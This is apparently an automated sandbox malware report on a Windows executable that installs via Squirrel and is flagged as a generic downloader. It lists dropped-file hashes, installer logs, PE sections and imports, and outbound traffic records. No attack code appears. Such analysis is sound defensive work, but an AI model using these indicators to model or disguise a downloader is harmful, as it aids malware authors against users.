                                                                            Encrypted:false
                                                                            SSDEEP:24576:exUDr9N97nRUQQ251L4JJB5N7cgLlAwwV/RBqS4XglqKiQmqJYYUcCfvVLqoG7dx:ei5JzQPkRAS4w7mq6o7diJFT6+kdSde
                                                                            MD5:EF839781397F38D05548467E490024AD
                                                                            SHA1:FF5018651431DC83BFDD8D82A114DD3760542B33
                                                                            SHA-256:480713BA0F339A9361AC516EC9FD06C0E43C18C8BE06BF6E647D580F7017BF3E
                                                                            SHA-512:AE920D424E945FA8161785EF222D59872EB513BB06B4D50BF2D548977063CD086C0211EFFBA160B9A5C595A295C399635089EB70C9B4A1F6948585676C0F08FC
                                                                            Malicious:true
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):29633574
                                                                            Entropy (8bit):7.999993888900749
                                                                            Encrypted:true
                                                                            SSDEEP:786432:G4Qt269TaEKww6K57xSukh8+CHwsotYrn:G4Ql9DKwoxNkEwsotYrn
                                                                            MD5:50212CBB0F92B6E321CFB929AA665B1E
                                                                            SHA1:9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B
                                                                            SHA-256:57C498CAD1C976690EC840CF581D5F5D2AD4D514009224A538C796FE457965B7
                                                                            SHA-512:97AFB6F8EB2E94E971F2DFBCBCDDB5CC2053AA27C3729C0753F45FC50B3233A73B81E0D9A4E6428EF6825A2B6C70AB7C477A5828FD2996BE9E31084FE3D452CD
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):75
                                                                            Entropy (8bit):4.810103650577109
                                                                            Encrypted:false
                                                                            SSDEEP:3:7om3ncIh6Vcmys3jlnF9fJxrGo:fMIh+cTsTlnDjGo
                                                                            MD5:24A3B66227DEF1B92C422BAA7C77D48E
                                                                            SHA1:0AB2FE17497F76458D312A25A614F7A83D77DB43
                                                                            SHA-256:B3F058CCB0C2ED25372204A558005422B780BF487FA5E2A0E2C1CC24C3B5D177
                                                                            SHA-512:EA44D50A83B43CE064B69A83272C7AC161FE6F62C620CCC360C1C4B98A2723BE931D687D118B0EB4D4091178F1D8668FAF768DB516C139953D21F39259E0E65E
                                                                            Malicious:false
                                                                            Preview:.9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B Extra-1.0.0-full.nupkg 29633574
                                                                            Process:C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe
                                                                            File Type:CSV text
                                                                            Category:modified
                                                                            Size (bytes):1281
                                                                            Entropy (8bit):5.370111951859942
                                                                            Encrypted:false
                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2751
                                                                            Entropy (8bit):5.372322730968244
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
                                                                            MD5:E186D8CCFA77C108F5C38908EF87820C
                                                                            SHA1:47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
                                                                            SHA-256:E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
                                                                            SHA-512:4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8773630
                                                                            Entropy (8bit):7.99997781368023
                                                                            Encrypted:true
                                                                            SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6owng4gB6nho8V9TT:HeZ4N80jwG3W2xR2YP6Meg4gBf8H
                                                                            MD5:51B2093E0B5ED5E5222783D1E118F078
                                                                            SHA1:D698D261CA3B18EE7A6395D4BFF47E7A9D8CCE4D
                                                                            SHA-256:2E5BE87C36974215CAFF5C0C47F862F4DC346AAE3B241120E60BB93ECC5DED7A
                                                                            SHA-512:12542523189F108CE20785ADADE42DFAF59105B6A247AF82FE7F4DA783F457F762BFF9B67862AA258C29867F8E78591DBD05E53A796308199A314ADD5830DA08
                                                                            Malicious:false
                                                                            Process:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):29633574
                                                                            Entropy (8bit):7.999993888900749
                                                                            Encrypted:true
                                                                            SSDEEP:786432:G4Qt269TaEKww6K57xSukh8+CHwsotYrn:G4Ql9DKwoxNkEwsotYrn
                                                                            MD5:50212CBB0F92B6E321CFB929AA665B1E
                                                                            SHA1:9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B
                                                                            SHA-256:57C498CAD1C976690EC840CF581D5F5D2AD4D514009224A538C796FE457965B7
                                                                            SHA-512:97AFB6F8EB2E94E971F2DFBCBCDDB5CC2053AA27C3729C0753F45FC50B3233A73B81E0D9A4E6428EF6825A2B6C70AB7C477A5828FD2996BE9E31084FE3D452CD
                                                                            Malicious:false
                                                                            Process:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):75
                                                                            Entropy (8bit):4.810103650577109
                                                                            Encrypted:false
                                                                            SSDEEP:3:7om3ncIh6Vcmys3jlnF9fJxrGo:fMIh+cTsTlnDjGo
                                                                            MD5:24A3B66227DEF1B92C422BAA7C77D48E
                                                                            SHA1:0AB2FE17497F76458D312A25A614F7A83D77DB43
                                                                            SHA-256:B3F058CCB0C2ED25372204A558005422B780BF487FA5E2A0E2C1CC24C3B5D177
                                                                            SHA-512:EA44D50A83B43CE064B69A83272C7AC161FE6F62C620CCC360C1C4B98A2723BE931D687D118B0EB4D4091178F1D8668FAF768DB516C139953D21F39259E0E65E
                                                                            Malicious:false
                                                                            Preview:.9D66ACA98B9CF2BEA1F098ADD4AE3E4098DCFC7B Extra-1.0.0-full.nupkg 29633574
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2353
                                                                            Entropy (8bit):5.310671120703352
                                                                            Encrypted:false
                                                                            SSDEEP:48:7/tHXNQ19MPxQViPGmQPYXbJ2MQVfu397u3WQRMQVQZ6m799/9WQRMQVQZ6mNRnD:7lTGiI8bTqz
                                                                            MD5:C077013A6051127E99AF8E8256EA9CDE
                                                                            SHA1:22D296F2B905391FE8CDA52EB2AFEF9A1838A737
                                                                            SHA-256:CF9B45AE216499BC35BAAA71AEC313790C184A4326DA5D33E00331F7D99A9F6D
                                                                            SHA-512:BB79697AEBF0C796EA4F7A1147207A2AEFFEF87E9A8A5B6A61A007A7CF61F664748FFB6B5FB0EFF73A822BBCEA725184384BB74B5774DB3EEE043EF2FD75E71E
                                                                            Malicious:false
                                                                            Preview:.[30/01/24 13:32:23] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[30/01/24 13:32:23] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[30/01/24 13:32:23] info: Program: About to install to: C:\Users\user\AppData\Local\Extra..[30/01/24 13:32:23] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[30/01/24 13:32:23] info: CheckForUpdateImpl: First run, starting from scratch..[30/01/24 13:32:24] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\Extra\app-1.0.0..[30/01/24 13:32:25] info: LogHost: Rigging execution stub for Stand_ExecutionStub.exe to C:\Users\user\AppData\Local\Extra\Stand.exe..[30/01/24 13:32:25] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[30/01/24 13:32:25] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[30/01/24 13:32:25] info: ApplyReleasesImpl: About to create shortcut
                                                                            Process:C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1899520
                                                                            Entropy (8bit):5.894883178349122
                                                                            Encrypted:false
                                                                            SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                                            MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                            SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                            SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                                            SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:ISO-8859 text, with CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):2.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:9:9
                                                                            MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                                                            SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                                                            SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                                                            SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):142
                                                                            Entropy (8bit):6.55447018279355
                                                                            Encrypted:false
                                                                            SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                            MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                            SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                            SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                            SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Tue Jan 30 11:32:25 2024, mtime=Tue Jan 30 11:32:25 2024, atime=Tue Jan 30 11:32:25 2024, length=195072, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2151
                                                                            Entropy (8bit):3.6747062146591913
                                                                            Encrypted:false
                                                                            SSDEEP:24:8IfJj7aRRQMRAFfQgiqc9qR9qCO4ZQgOqqe3gP7lqy1Efdqm:8IfJjKRQMiFQ7L9C9VZQhqyPQy1Efg
                                                                            MD5:8601498AE7CEEAE12335432EE044C753
                                                                            SHA1:AA69DFCB1C830304495D006F9DF7C594A98CF3FE
                                                                            SHA-256:83829B7937AD4B470373B0E9CF75B950CC6E74A3D7757456E1566DCCBFD8CC07
                                                                            SHA-512:E850630CF00E2BA7BFBC37BCF3AE5BC0E018FA513744AB20E5121825AAFBA86D3FE7BDDCE0DD6D2EA2F0B365ACA6862EB73C2EA0752CBD66E11E659A9256B1F6
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Tue Jan 30 11:32:25 2024, mtime=Tue Jan 30 11:32:26 2024, atime=Tue Jan 30 11:32:25 2024, length=195072, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2137
                                                                            Entropy (8bit):3.673973824477649
                                                                            Encrypted:false
                                                                            SSDEEP:48:8ofJjJ1dRWMiFQtL9C9VZQhqyPQy1Efg:8Uj39Wyaf
                                                                            MD5:4117BD7FF3E34E1DF16B3ED553775808
                                                                            SHA1:9CA23735B565AAF9C513EE20184EBD824878D203
                                                                            SHA-256:2B18E23AE1D84B46133DAD0B6065B296819C1D69901A168C08DC8D57F02737FE
                                                                            SHA-512:0A3FE16D63A19762F49060E28F1A9D744E39589A49FA77DB9A6DB5A688012C22733C04BCD1E45D0D7AB0EAFD09D2ACC29464B9CA3F143DF45D25B8E22BE998D4
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. .....(axS.....axS...A+axS............................:..DG..Yr?.D..U..k0.&...&......vk.v......DZxS...=.axS......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>X.d...........................%..A.p.p.D.a.t.a...B.P.1.....>X.d..Local.<......CW.^>X.d....b.....................W.D.L.o.c.a.l.....P.1.....>X.d..Extra.<......>X.d>X.d...........................x.E.x.t.r.a.....\.2.....>X.d .Stand.exe.D......>X.d>X.d..........................N'v.S.t.a.n.d...e.x.e.......[...............-.......Z...........r:Z......C:\Users\user\AppData\Local\Extra\Stand.exe....E.x.t.r.a. .....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.S.t.a.n.d...e.x.e.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.a.p.p.-.1...0...0.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.E.x.t.r.a.\.S.t.a.n.d...e.x.e.........%USERPROFILE%\AppData\Local\Extra\Stand.exe................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.999657674325429
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            File size:30'540'800 bytes
                                                                            MD5:511fdcc7fc2f4220353004cfb011f522
                                                                            SHA1:93ef93aa71476734b1598037838cc6b9fc8b47f7
                                                                            SHA256:b457a493fad9212b369552df689d67b5e1feec656451cf586abcc5411cee6e00
                                                                            SHA512:1ab6d38ab8e55b5b56675a85f1e8af25e9f405e2d00ef820ae67495a7311b4f0d4fa91cefb04cc34f2d5af481d00457e8b1024126e7fd98489caaa223d469b71
                                                                            SSDEEP:786432:iiYxcIt7okKo+IWpppwOg1ok6n4kCn8d:iiY7tpKocpXge4kCn8d
                                                                            TLSH:7267332253226636D3F28CB767B9177629377B284832EFAFD24417748E18073AF64761
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X........................y.......................................................a...T.......T.Z.......2.....T.......Rich...
                                                                            Icon Hash:13170f6d2d6d6d33
                                                                            Entrypoint:0x40ab5c
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:e6f4169f2a5c3a8f93171d9f593bd22a
                                                                            Instruction
                                                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x2932c          0x50          .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2c000          0x1cf5418     .rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1d22000        0x190c        .reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x27720          0x70          .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x1f398          0x40          .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT             0x1f000          0x1a4         .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x28ef0          0xe0          .rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                            Name    Virtual Address  Virtual Size  Raw Size   MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
                                                                            .text   0x1000           0x1d32b       0x1d400    723597f58d5674921108e642a8e1b5b4  False     0.5962540064102564   data       6.658318567238198  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata  0x1f000          0xacae        0xae00     fa1645fd03dda975b8bd67904b34af32  False     0.44526760057471265  data       4.948544868021258  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data   0x2a000          0x1870        0xe00      f8724007e5d2ce85c65b5408a736d005  False     0.21484375           data       3.016754020922221  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc   0x2c000          0x1cf5418     0x1cf5600  08ef6b40a5f9f3088e2b01984dff3318  unknown   unknown              unknown    unknown            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc  0x1d22000        0x190c        0x1a00     fca0dc86189b5b127d85095ebd6abd95  False     0.7630709134615384   data       6.514362877721557  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            Name           RVA        Size       Type  Language  Country  ZLIB Complexity
                                                                            DATA           0x2c340    0x1cf2764  Zip archive data, at least v2.0 to extract, compression method=deflate  English  United States  1.0003108978271484
                                                                            FLAGS          0x1d1eaa4  0xc        data  English  United States  1.6666666666666667
                                                                            RT_ICON        0x1d1eab0  0x2e8      Device independent bitmap graphic, 32 x 64 x 4, image size 512  English  United States  0.21774193548387097
                                                                            RT_ICON        0x1d1ed98  0x8a8      Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  English  United States  0.11597472924187725
                                                                            RT_ICON        0x1d1f640  0x2e8      Device independent bitmap graphic, 32 x 64 x 4, image size 512  English  United States  0.21774193548387097
                                                                            RT_ICON        0x1d1f928  0x8a8      Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors  English  United States  0.11597472924187725
                                                                            RT_STRING      0x1d201d0  0x418      data  English  United States  0.3148854961832061
                                                                            RT_STRING      0x1d205e8  0x604      data  English  United States  0.21363636363636362
                                                                            RT_STRING      0x1d20bec  0x152      data  English  United States  0.5591715976331361
                                                                            RT_GROUP_ICON  0x1d20d40  0x22       data  English  United States  1.0588235294117647
                                                                            RT_GROUP_ICON  0x1d20d64  0x22       data  English  United States  1.088235294117647
                                                                            RT_VERSION     0x1d20d88  0x2a8      data  English  United States  0.4661764705882353
                                                                            RT_MANIFEST    0x1d21030  0x3e7      XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminators  English  United States  0.5145145145145145
                                                                            DLL           Import
                                                                            KERNEL32.dll  LoadResource, FindResourceW, lstrlenW, GetProcAddress, GetModuleHandleW, DeleteCriticalSection, GetTempPathW, GetLastError, GetTempFileNameW, MoveFileW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, DeleteFileW, GetModuleFileNameW, GetCurrentProcess, LoadLibraryW, FreeLibrary, InitializeCriticalSectionEx, GetFileAttributesW, CreateFileW, SetFilePointer, ReadFile, VerSetConditionMask, GetCurrentDirectoryW, MultiByteToWideChar, LocalFileTimeToFileTime, WideCharToMultiByte, CreateDirectoryW, WriteFile, SetFileTime, FreeResource, SizeofResource, LockResource, CreateProcessW, GetSystemDirectoryW, SetDefaultDllDirectories, GetCurrentThreadId, DecodePointer, RaiseException, LeaveCriticalSection, EnterCriticalSection, lstrcmpiW, LoadLibraryExW, GetConsoleMode, GetConsoleCP, SystemTimeToFileTime, VerifyVersionInfoW, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetStdHandle, HeapFree, HeapAlloc, GetFileType, CompareStringW, LCMapStringW, HeapSize, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, GetStringTypeW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, WriteConsoleW
                                                                            SHLWAPI.dll   PathIsUNCW
                                                                            COMCTL32.dll  InitCommonControlsEx
                                                                            Language of compilation system  Country where language is spoken  Map
                                                                            English                         United States
                                                                            Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                            Jan 30, 2024 13:32:41.816497087 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.816504002 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.816520929 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.816550970 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.816557884 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.816734076 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.816766024 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.816786051 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.816817999 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.816838026 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.816844940 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.816860914 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.816893101 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.876857042 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.876884937 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.876934052 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.876941919 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:41.876976967 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:41.877036095 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043540955 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043574095 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043612003 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043628931 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043646097 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043698072 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043730021 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043736935 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043776035 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:42.043802023 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:42.043832064 CET49735443192.168.2.452.95.163.114
